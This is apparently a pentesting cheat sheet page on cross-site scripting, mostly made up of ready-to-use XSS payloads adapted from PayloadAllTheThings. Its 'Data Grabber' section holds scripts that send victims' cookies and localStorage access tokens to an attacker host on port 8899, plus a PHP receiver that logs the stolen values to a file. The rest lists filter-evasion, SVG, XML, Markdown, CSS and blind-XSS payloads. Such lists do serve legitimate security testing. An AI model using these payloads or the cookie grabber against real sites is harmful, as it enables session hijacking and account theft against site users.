Skip to main content

index

Cross Site Scripting (XSS)

Cross-Site Scripting (XSS) is a web vulnerability that allows attackers to inject malicious scripts into web pages viewed by users. These scripts can steal cookies, session tokens, or perform actions on behalf of users.

Types of XSS:

  1. Stored – Script is saved on the server and served to users.
  2. Reflected – Script is in the URL or input and reflected back.
  3. DOM-based – Client-side scripts modify the page DOM insecurely.
What is self-XSS?

Since the attack requires the victim to willingly execute code themselves, it's not considered a vulnerability in the application’s code. Most bug bounty programs mark it as out of scope.

Data Grabber

<script>document.location='http://ip:8899/XSS/grabber.php?c='+document.cookie</script>
<script>document.location='http://ip:8899/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>
<script>new Image().src="http://ip:8899/cookie.php?c="+document.cookie;</script>
<script>new Image().src="http://ip:8899/cookie.php?c="+localStorage.getItem('access_token');</script>

Write the collected data into a file.

php -S localhost:8899
// grabber.php or cookie.php
<?php
$cookie = $_GET['c'];
$fp = fopen('cookies.txt', 'a+');
fwrite($fp, 'Cookie:' .$cookie."\r\n");
fclose($fp);
?>

Common XSS Payloads

<strong>// Basic payload
</strong>&#x3C;script>alert('XSS')&#x3C;/script>
&#x3C;scr&#x3C;script>ipt>alert('XSS')&#x3C;/scr&#x3C;script>ipt>
">&#x3C;script>alert('XSS')&#x3C;/script>
">&#x3C;script>alert(String.fromCharCode(88,83,83))&#x3C;/script>
&#x3C;script>\u0061lert('22')&#x3C;/script>
&#x3C;script>eval('\x61lert(\'33\')')&#x3C;/script>
&#x3C;script>eval(8680439..toString(30))(983801..toString(36))&#x3C;/script> //parseInt("confirm",30) == 8680439 &#x26;&#x26; 8680439..toString(30) == "confirm"
&#x3C;object/data="jav&#x26;#x61;sc&#x26;#x72;ipt&#x26;#x3a;al&#x26;#x65;rt&#x26;#x28;23&#x26;#x29;">

<strong>// Img payload
</strong>&#x3C;img src=x onerror=alert('XSS');>
&#x3C;img src=x onerror=alert('XSS')//
&#x3C;img src=x onerror=alert(String.fromCharCode(88,83,83));>
&#x3C;img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
&#x3C;img src=x:alert(alt) onerror=eval(src) alt=xss>
">&#x3C;img src=x onerror=alert('XSS');>
">&#x3C;img src=x onerror=alert(String.fromCharCode(88,83,83));>
&#x3C;>&#x3C;img src=1 onerror=alert(1)>

<strong>// Svg payload
</strong>&#x3C;svgonload=alert(1)>
&#x3C;svg/onload=alert('XSS')>
&#x3C;svg onload=alert(1)//
&#x3C;svg/onload=alert(String.fromCharCode(88,83,83))>
&#x3C;svg id=alert(1) onload=eval(id)>
">&#x3C;svg/onload=alert(String.fromCharCode(88,83,83))>
">&#x3C;svg/onload=alert(/XSS/)
&#x3C;svg>&#x3C;script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)
&#x3C;svg>&#x3C;script>alert('33')
&#x3C;svg>&#x3C;script>alert&#x26;lpar;'33'&#x26;rpar;

<strong>// Div payload
</strong>&#x3C;div onpointerover="alert(45)">MOVE HERE&#x3C;/div>
&#x3C;div onpointerdown="alert(45)">MOVE HERE&#x3C;/div>
&#x3C;div onpointerenter="alert(45)">MOVE HERE&#x3C;/div>
&#x3C;div onpointerleave="alert(45)">MOVE HERE&#x3C;/div>
&#x3C;div onpointermove="alert(45)">MOVE HERE&#x3C;/div>
&#x3C;div onpointerout="alert(45)">MOVE HERE&#x3C;/div>
&#x3C;div onpointerup="alert(45)">MOVE HERE&#x3C;/div>

<strong>// XSS Using HTML5 Tags
</strong>&#x3C;body onload=alert(/XSS/.source)>
&#x3C;input autofocus onfocus=alert(1)>
&#x3C;select autofocus onfocus=alert(1)>
&#x3C;textarea autofocus onfocus=alert(1)>
&#x3C;keygen autofocus onfocus=alert(1)>
&#x3C;video/poster/onerror=alert(1)>
&#x3C;video>&#x3C;source onerror="javascript:alert(1)">
&#x3C;video src=_ onloadstart="alert(1)">
&#x3C;details/open/ontoggle="alert`1`">
&#x3C;audio src onloadstart=alert(1)>
&#x3C;marquee onstart=alert(1)>
&#x3C;meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10&#x3C;/meter>

&#x3C;body ontouchstart=alert(1)> // Triggers when a finger touch the screen
&#x3C;body ontouchend=alert(1)>   // Triggers when a finger is removed from touch screen
&#x3C;body ontouchmove=alert(1)>  // When a finger is dragged across the screen.

Cool XSS Tricks

XSS in Hidden Input

<input type="hidden" accesskey="X" onclick="alert(1)">
// Use CTRL+SHIFT+X to trigger the onclick event

In newer browsers: firefox-130/chrome-108 

<input type="hidden" oncontentvisibilityautostatechange="alert(1)"  style="content-visibility:auto" >

Better Payload

<script>alert(document.domain.concat("\n").concat(window.origin))</script>

While alert() is nice for reflected XSS it can quickly become a burden for stored XSS because it requires to close the popup for each execution, so console.log() can be used instead to display a message in the console of the developer console (doesn't require any interaction).

DOM Based XSS

// Based on a DOM XSS sink.
#"><img src=/ onerror=alert(2)>

XSS in JS Context

-(confirm)(document.domain)//
; alert(1);//
// (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic)

XSS in Files

XML

info

NOTE: The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup.

<name>
  <value><![CDATA[<script>confirm(document.domain)</script>]]></value>
</name>
<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
</body>
</html>

SVG

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.domain);
  </script>
</svg>

Short SVG Payloads:

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>

Markdown

[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)

CSS

<!DOCTYPE html>
<html>
<head>
<style>
div  {
    background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>");
    background-color: #cccccc;
}
</style>
</head>
  <body>
    <div>lol</div>
  </body>
</html>

Blind XSS

Blind XSS occurs when malicious JavaScript is injected into a page but executed in a different context (e.g., admin panel) where the attacker can't see the result directly.

XSS Hunter

  1. Sign up at XSS Hunter and get a unique payload.
  2. Choose a payload and Inject the payload in suspected input fields.
  3. When a vulnerable page loads the payload, XSS Hunter notifies you with request/DOM details, confirming blind XSS.
info

Self-hosting option: https://github.com/mandatoryprogrammer/xsshunter-express

Blind XSS endpoint

  • Contact forms
  • Ticket support
  • Referer Header
    • Custom Site Analytics
    • Administrative Panel logs
  • User Agent
    • Custom Site Analytics
    • Administrative Panel logs
  • Comment Box
    • Administrative Panel
success

We can use data grabber technique as well for blind XSS testing.

CSP Bypass

A tool designed to help ethical hackers bypass restrictive Content Security Policies (CSP) and exploit XSS (Cross-Site Scripting) vulnerabilities on sites where injections are blocked by CSPs that only allow certain whitelisted domains.

success

https://cspbypass.com/

More

Credit: PayloadAllTheThings

  1. Filter Bypass
  2. Polygot XSS
  3. Common WAF Bypass
  4. CSP Bypass
  5. XSS in Angular